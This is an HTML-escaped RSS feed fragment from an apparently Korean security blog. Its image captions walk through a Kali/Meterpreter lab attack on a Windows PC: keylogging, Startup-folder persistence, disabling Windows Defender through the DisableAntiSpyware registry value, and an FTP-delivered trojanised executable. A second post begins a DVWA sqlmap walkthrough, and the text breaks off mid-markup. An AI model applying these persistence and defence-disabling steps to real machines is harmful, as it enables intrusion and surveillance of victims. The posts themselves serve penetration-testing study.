&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;379&quot; data-origin-height=&quot;65&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdhPJX/btrZiW6xUQo/R2YQeVoDzTkoHRarYGBQN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdhPJX/btrZiW6xUQo/R2YQeVoDzTkoHRarYGBQN1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdhPJX/btrZiW6xUQo/R2YQeVoDzTkoHRarYGBQN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdhPJX%2FbtrZiW6xUQo%2FR2YQeVoDzTkoHRarYGBQN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;379&quot; height=&quot;65&quot; data-origin-width=&quot;379&quot; data-origin-height=&quot;65&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1282&quot; data-origin-height=&quot;723&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yISag/btrZi7NK08f/HivOLl5vpkf47ScxYLyh5K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yISag/btrZi7NK08f/HivOLl5vpkf47ScxYLyh5K/img.png&quot; data-alt=&quot;윈도우 화면을 캡처할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yISag/btrZi7NK08f/HivOLl5vpkf47ScxYLyh5K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FyISag%2FbtrZi7NK08f%2FHivOLl5vpkf47ScxYLyh5K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1282&quot; height=&quot;723&quot; data-origin-width=&quot;1282&quot; data-origin-height=&quot;723&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;윈도우 화면을 캡처할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;620&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bOKSSo/btrZkaiBKZS/UXRSLlK9w8yJ4SPSAModO1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bOKSSo/btrZkaiBKZS/UXRSLlK9w8yJ4SPSAModO1/img.png&quot; data-alt=&quot;윈도우에서 키보드 조작또한 로그로 남겨서 확인이 가능하다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bOKSSo/btrZkaiBKZS/UXRSLlK9w8yJ4SPSAModO1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbOKSSo%2FbtrZkaiBKZS%2FUXRSLlK9w8yJ4SPSAModO1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;620&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;620&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;윈도우에서 키보드 조작또한 로그로 남겨서 확인이 가능하다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;111&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wBczv/btrZmEwvxnD/Jtv19gpcXGOiJusOYvRAb1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wBczv/btrZmEwvxnD/Jtv19gpcXGOiJusOYvRAb1/img.png&quot; data-alt=&quot;칼리리눅스에있는 파일을 윈도우로 업로드 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wBczv/btrZmEwvxnD/Jtv19gpcXGOiJusOYvRAb1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwBczv%2FbtrZmEwvxnD%2FJtv19gpcXGOiJusOYvRAb1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;758&quot; height=&quot;111&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;111&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;칼리리눅스에있는 파일을 윈도우로 업로드 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1150&quot; data-origin-height=&quot;173&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/DCV6r/btrZo9bVqs0/Vn29XUPGcAqylmGo6EkKDk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/DCV6r/btrZo9bVqs0/Vn29XUPGcAqylmGo6EkKDk/img.png&quot; data-alt=&quot;(C:\Users\st01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) 공격대상자 PC에 사용자 시작프로그램 디렉토리로 이동하여 악성코드를 바로 실행할 프로그램을 바로가기 추가해 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/DCV6r/btrZo9bVqs0/Vn29XUPGcAqylmGo6EkKDk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDCV6r%2FbtrZo9bVqs0%2FVn29XUPGcAqylmGo6EkKDk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1150&quot; height=&quot;173&quot; data-origin-width=&quot;1150&quot; data-origin-height=&quot;173&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;(C:\Users\st01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) 공격대상자 PC에 사용자 시작프로그램 디렉토리로 이동하여 악성코드를 바로 실행할 프로그램을 바로가기 추가해 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;윈도우 디펜더 비활성화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 윈도우키 + R 실행하여 regedit을 입력하여 레스트리 편집기를 실행한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;284&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/3wkH8/btrZew1CUES/XkkPRSn88ec9cug3Gvkclk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/3wkH8/btrZew1CUES/XkkPRSn88ec9cug3Gvkclk/img.png&quot; data-alt=&quot;Windows Defender폴더를 클릭하고 오른쪽 화면을 오른쪽 클릭 새로만들기 DWORD(32비트)로 만들고 값을 1로 설정하고 이름은 DisableAntiSpyware로 해준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/3wkH8/btrZew1CUES/XkkPRSn88ec9cug3Gvkclk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F3wkH8%2FbtrZew1CUES%2FXkkPRSn88ec9cug3Gvkclk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;731&quot; height=&quot;284&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;284&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Windows Defender폴더를 클릭하고 오른쪽 화면을 오른쪽 클릭 새로만들기 DWORD(32비트)로 만들고 값을 1로 설정하고 이름은 DisableAntiSpyware로 해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;722&quot; data-origin-height=&quot;431&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/n8Sey/btrZiQFrSqW/VKHIy6cCccpWNsZYEeMrKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/n8Sey/btrZiQFrSqW/VKHIy6cCccpWNsZYEeMrKK/img.png&quot; data-alt=&quot;생성한 레지스트리를 밖으로 내보기하고 삭제하고 재부팅 해준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/n8Sey/btrZiQFrSqW/VKHIy6cCccpWNsZYEeMrKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fn8Sey%2FbtrZiQFrSqW%2FVKHIy6cCccpWNsZYEeMrKK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;722&quot; height=&quot;431&quot; data-origin-width=&quot;722&quot; data-origin-height=&quot;431&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;생성한 레지스트리를 밖으로 내보기하고 삭제하고 재부팅 해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;재부팅결과 디펜더가 비활성화가 되지않아 로컬 그룹 정책 편집기를 사용한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;윈도우 디펜더 비활성화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 로컬 그룹 정책 편집기&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1405&quot; data-origin-height=&quot;623&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HUg1l/btrZoqdJxCv/kg9tDK6KPW3evrMsf2qc9K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HUg1l/btrZoqdJxCv/kg9tDK6KPW3evrMsf2qc9K/img.png&quot; data-alt=&quot;로컬 그룹 정책 편집기에서 디펜더 바이러스 백신 끄기 사용으로 체크하여 적용해주고 재부팅 해준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HUg1l/btrZoqdJxCv/kg9tDK6KPW3evrMsf2qc9K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHUg1l%2FbtrZoqdJxCv%2Fkg9tDK6KPW3evrMsf2qc9K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1405&quot; height=&quot;623&quot; data-origin-width=&quot;1405&quot; data-origin-height=&quot;623&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;로컬 그룹 정책 편집기에서 디펜더 바이러스 백신 끄기 사용으로 체크하여 적용해주고 재부팅 해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1557&quot; data-origin-height=&quot;519&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/T9yqf/btrZg9ZAUjV/IxanKwz4AteJTKVyFRzpT1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/T9yqf/btrZg9ZAUjV/IxanKwz4AteJTKVyFRzpT1/img.png&quot; data-alt=&quot;재부팅 결과 사용체크가 풀려서 사용하지 못하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/T9yqf/btrZg9ZAUjV/IxanKwz4AteJTKVyFRzpT1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FT9yqf%2FbtrZg9ZAUjV%2FIxanKwz4AteJTKVyFRzpT1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1557&quot; height=&quot;519&quot; data-origin-width=&quot;1557&quot; data-origin-height=&quot;519&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;재부팅 결과 사용체크가 풀려서 사용하지 못하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1567&quot; data-origin-height=&quot;505&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/19j3I/btrZkSve64k/mazNUxkZLGmzDrgaOkwf61/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/19j3I/btrZkSve64k/mazNUxkZLGmzDrgaOkwf61/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/19j3I/btrZkSve64k/mazNUxkZLGmzDrgaOkwf61/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F19j3I%2FbtrZkSve64k%2FmazNUxkZLGmzDrgaOkwf61%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1567&quot; height=&quot;505&quot; data-origin-width=&quot;1567&quot; data-origin-height=&quot;505&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;실행파일을 이용한 악성코드 침투&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;141&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bc3fOD/btrZjyREsa5/sJGglqAyoTGqvqUWcHjnHK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bc3fOD/btrZjyREsa5/sJGglqAyoTGqvqUWcHjnHK/img.png&quot; data-alt=&quot;실행파일에 악성 코드를 삽입하여 실행파일을 만들어 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bc3fOD/btrZjyREsa5/sJGglqAyoTGqvqUWcHjnHK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbc3fOD%2FbtrZjyREsa5%2FsJGglqAyoTGqvqUWcHjnHK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;900&quot; height=&quot;141&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;141&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;실행파일에 악성 코드를 삽입하여 실행파일을 만들어 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;573&quot; data-origin-height=&quot;227&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mfDZJ/btrZhTPQEsf/jM949wzZDAg7RuaMX4DmN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mfDZJ/btrZhTPQEsf/jM949wzZDAg7RuaMX4DmN1/img.png&quot; data-alt=&quot;ftp를 이용하여 공격자 PC에서 악성코드가 담긴 실행파일을 다운받는다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mfDZJ/btrZhTPQEsf/jM949wzZDAg7RuaMX4DmN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmfDZJ%2FbtrZhTPQEsf%2FjM949wzZDAg7RuaMX4DmN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;573&quot; height=&quot;227&quot; data-origin-width=&quot;573&quot; data-origin-height=&quot;227&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;ftp를 이용하여 공격자 PC에서 악성코드가 담긴 실행파일을 다운받는다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;602&quot; data-origin-height=&quot;25&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/k4sTl/btrZhThW9nl/UbtvbLmeQRWFiKrBQSeX3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/k4sTl/btrZhThW9nl/UbtvbLmeQRWFiKrBQSeX3K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/k4sTl/btrZhThW9nl/UbtvbLmeQRWFiKrBQSeX3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fk4sTl%2FbtrZhThW9nl%2FUbtvbLmeQRWFiKrBQSeX3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;602&quot; height=&quot;25&quot; data-origin-width=&quot;602&quot; data-origin-height=&quot;25&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1351&quot; data-origin-height=&quot;516&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bFj55v/btrZiPNl6xa/wMpr2pbwzTsCVRkykcy5n1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bFj55v/btrZiPNl6xa/wMpr2pbwzTsCVRkykcy5n1/img.png&quot; data-alt=&quot;공격 대상자 PC에서 해당 실행파일을 실행하면 미터프리터환경이 연결된다. 이때 관리자 권한으로 실행을 하지 않아 hashdump명령어는 사용하지 못한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFj55v/btrZiPNl6xa/wMpr2pbwzTsCVRkykcy5n1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFj55v%2FbtrZiPNl6xa%2FwMpr2pbwzTsCVRkykcy5n1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1351&quot; height=&quot;516&quot; data-origin-width=&quot;1351&quot; data-origin-height=&quot;516&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자 PC에서 해당 실행파일을 실행하면 미터프리터환경이 연결된다. 이때 관리자 권한으로 실행을 하지 않아 hashdump명령어는 사용하지 못한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/75</guid>
      <comments>https://it-mandarine.tistory.com/75#entry75comment</comments>
      <pubDate>Wed, 15 Feb 2023 09:33:36 +0900</pubDate>
    </item>
    <item>
      <title>DVWA blind injection</title>
      <link>https://it-mandarine.tistory.com/73</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;886&quot; data-origin-height=&quot;147&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BKJeG/btrYV9YRAGI/0ihIJPeDsK6dRvWM67wbr0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BKJeG/btrYV9YRAGI/0ihIJPeDsK6dRvWM67wbr0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BKJeG/btrYV9YRAGI/0ihIJPeDsK6dRvWM67wbr0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBKJeG%2FbtrYV9YRAGI%2F0ihIJPeDsK6dRvWM67wbr0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;886&quot; height=&quot;147&quot; data-origin-width=&quot;886&quot; data-origin-height=&quot;147&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1122&quot; data-origin-height=&quot;794&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/2mbvA/btrY5mb0NF2/BmMrLHwVVYR7400RbZtTVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/2mbvA/btrY5mb0NF2/BmMrLHwVVYR7400RbZtTVk/img.png&quot; data-alt=&quot;SQL Injection(Blind) 항목을 클릭한 뒤 10 입력한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/2mbvA/btrY5mb0NF2/BmMrLHwVVYR7400RbZtTVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F2mbvA%2FbtrY5mb0NF2%2FBmMrLHwVVYR7400RbZtTVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1122&quot; height=&quot;794&quot; data-origin-width=&quot;1122&quot; data-origin-height=&quot;794&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;SQL Injection(Blind) 항목을 클릭한 뒤 10 입력한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;507&quot; data-origin-height=&quot;47&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c7dPJw/btrZahaazl4/PVDI6X7CLkEcVSFlEgwpl1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c7dPJw/btrZahaazl4/PVDI6X7CLkEcVSFlEgwpl1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7dPJw/btrZahaazl4/PVDI6X7CLkEcVSFlEgwpl1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7dPJw%2FbtrZahaazl4%2FPVDI6X7CLkEcVSFlEgwpl1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;507&quot; height=&quot;47&quot; data-origin-width=&quot;507&quot; data-origin-height=&quot;47&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1371&quot; data-origin-height=&quot;433&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bc0ExI/btrYT958WkQ/HYvBsF1W5kmoHIK7SYbiw1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bc0ExI/btrYT958WkQ/HYvBsF1W5kmoHIK7SYbiw1/img.png&quot; data-alt=&quot;tcpdump 도구를 이용하여 해쉬 정보를 추출하고 따로 기억한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bc0ExI/btrYT958WkQ/HYvBsF1W5kmoHIK7SYbiw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbc0ExI%2FbtrYT958WkQ%2FHYvBsF1W5kmoHIK7SYbiw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1371&quot; height=&quot;433&quot; data-origin-width=&quot;1371&quot; data-origin-height=&quot;433&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;tcpdump 도구를 이용하여 해쉬 정보를 추출하고 따로 기억한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1905&quot; data-origin-height=&quot;942&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bpwAwO/btrYThp52MJ/8HC7zTyKLff2Kqimm1BvM0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bpwAwO/btrYThp52MJ/8HC7zTyKLff2Kqimm1BvM0/img.png&quot; data-alt=&quot;\SQLMap은 파이썬 언어로 작성한 SQL 삽입 취약점 점검 도구로서 모의 침투 수행 시 필수적인 도구중 하나이다. 추출한 쿠기 정보를 이용하여 기본 문구를 작성하고 끝에 --banner를 적어 배너 정보를 획득한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bpwAwO/btrYThp52MJ/8HC7zTyKLff2Kqimm1BvM0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbpwAwO%2FbtrYThp52MJ%2F8HC7zTyKLff2Kqimm1BvM0%2Fimg.png&quot; onerror=&quot;this.onerror=null; 